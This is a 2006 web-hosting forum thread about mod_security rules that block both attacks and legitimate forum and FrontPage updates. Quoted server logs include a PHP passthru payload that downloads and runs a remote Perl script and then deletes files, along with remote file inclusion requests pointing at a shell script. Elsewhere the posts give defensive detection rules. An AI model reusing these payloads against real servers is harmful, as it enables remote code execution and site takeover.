Results 26 to 36 of 36
Thread: mod security problem
-
09-10-2006, 02:34 PM #26Web Hosting Master
- Join Date
- May 2003
- Location
- Florida
- Posts
- 902
Originally Posted by The Blind Can See
Code:<? passthru('cd /tmp;wget http://trendpresent.de/sh;perl sh;rm -f *'); passthru('cd /tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *'); passthru('cd /tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *'); passthru('cd /tmp;lynx -source ttp://trendpresent.de/sh >sh;perl sh;rm -f *'); passthru('cd /tmp;fetch ttp://trendpresent.de/sht >sh;perl sh;rm -f *'); passthru('cd /tmp;GET ttp://trendpresent.de/sh >sh;perl sh;rm -f *'); passthru('cd /dev/shm;wget http://trendpresent.de/sh;perl sh;rm -f *'); passthru('cd /dev/shm;curl -O http://trendpresent.de/sh;perl sh;rm -f *'); passthru('cd /dev/shm;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *'); passthru('cd /dev/shm;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *'); passthru('cd /dev/shm;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *'); passthru('cd /dev/shm;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *'); passthru('cd /var/tmp;wget http://trendpresent.de/sh;perl sh;rm -f *'); passthru('cd /var/tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *'); passthru('cd /var/tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *'); passthru('cd /var/tmp;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *'); passthru('cd /var/tmp;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *'); passthru('cd /var/tmp;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *'); ?>
-
09-10-2006, 02:36 PM #27Account Suspended
- Join Date
- Sep 2006
- Posts
- 39
Thanks for the info...here's a question...where did you get these logs from? I didn't post that
-
09-10-2006, 02:53 PM #28Account Suspended
- Join Date
- Sep 2006
- Posts
- 39
Here is more...
One is for my forum, gives 403 when attempting to save updated vbulletin templateLast edited by The Blind Can See; 09-10-2006 at 02:57 PM.
-
09-10-2006, 02:58 PM #29Web Hosting Master
- Join Date
- May 2003
- Location
- Florida
- Posts
- 902
Originally Posted by The Blind Can See
==23bb7470==============================
Request: www.hosteddomain.com 70.87.119.68 - - [10/Sep/2006:13:12:32 -0500] "GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1" 403 437 "-" "libwww-perl/5.805" - "-"
----------------------------------------
GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1
Connection: TE, close
Host: www.hosteddomain.com
TE: deflate,gzip;q=0.3
User-Agent: libwww-perl/5.805
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"][rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"]
If you check that link, it is what I posted.
-
09-10-2006, 03:02 PM #30Web Hosting Master
- Join Date
- May 2003
- Location
- Florida
- Posts
- 902
Originally Posted by The Blind Can See
GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sylviawebster.f2s.com/mmf/extWiki//htdocs/files/c99shell_r16.txt
I imagine the rule stopping your update is the one with alter|create|drop in it. You can either turn that rule off, allow it for your site only, or turn it off only when you need to update the theme.
-
09-10-2006, 03:05 PM #31Account Suspended
- Join Date
- Sep 2006
- Posts
- 39
Thanks..... that is the same line that gave me the 403 in my site
Code:#Generic SQL sigs SecFilterSelective ARGS "((alter|create|drop)[[:space:]]+(column|database|procedure|table)|delete[[:space:]]+from|update.+set.+=)" "id:300015,rev:1,severity:2,msg:'Generic SQL injection protection'"
-
09-10-2006, 03:11 PM #32Account Suspended
- Join Date
- Sep 2006
- Posts
- 39
By the way, anyone have a remedy for losers who have nothing better to do than to attempt to hack others all day long?
-
09-10-2006, 03:22 PM #33Web Hosting Master
- Join Date
- May 2003
- Location
- Florida
- Posts
- 902
Originally Posted by The Blind Can See
SecFilterDefaultAction "deny,log,status:403"
To something like:
SecFilterDefaultAction "deny,log,redirect:http://www.google.com"
This would redirect them to google instead of your site. I guess you could also direct them somebody better. Won't stop them.
It would be good if somebody would write a mod_security rule that adds them to the firewall deny.
-
09-10-2006, 10:05 PM #34Disabled
- Join Date
- May 2003
- Location
- behind your business
- Posts
- 70
Originally Posted by The Blind Can See
<VirtualHost IP:80>
.
.
SecFilterRemove 300015
.
</VirtualHost>
-asc2000-
-
09-10-2006, 10:08 PM #35Account Suspended
- Join Date
- Sep 2006
- Posts
- 39
I'll try that..here's another problem. Cannot publish through frontpage (oddly, it worked a few times and suddenly stopped, AFTER the rules were already applied)
apache log:
[Sun Sep 10 21:02:57 2006] [error] [client xx.xx.xx] mod_security: Access denied with code 403. Pattern match "(((URL|SRC|HREF|LOWSRC)[\\\\s]*=)|(url[\\\\s]*[\\\\(]))[\\\\s]*[\\\\'\\"]*[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*j[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*a[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*v[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*a[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*s[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*c[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*r[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*i[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*p[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*t[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*[\\\\:]" at POST_PAYLOAD [hostname "mydomain.com"] [uri "/_vti_bin/_vti_aut/author.exe"]
I removed these two from modsec.conf
SecFilterSelective POST_PAYLOAD "cc:"
SecFilterSelective POST_PAYLOAD "cc:\x20"
Still doesn't publish (403 error)
I even added this
###########################################
#Front page exclusions
###########################################
< LocationMatch "/_vti_bin/_vti_aut/author.exe" >
SecFilterInheritance Off
< /LocationMatch >
Caused apache to fail
-
09-10-2006, 10:32 PM #36Account Suspended
- Join Date
- Sep 2006
- Posts
- 39
The line causing the 403 is
Code:SecFilter "(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\'\"]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:]"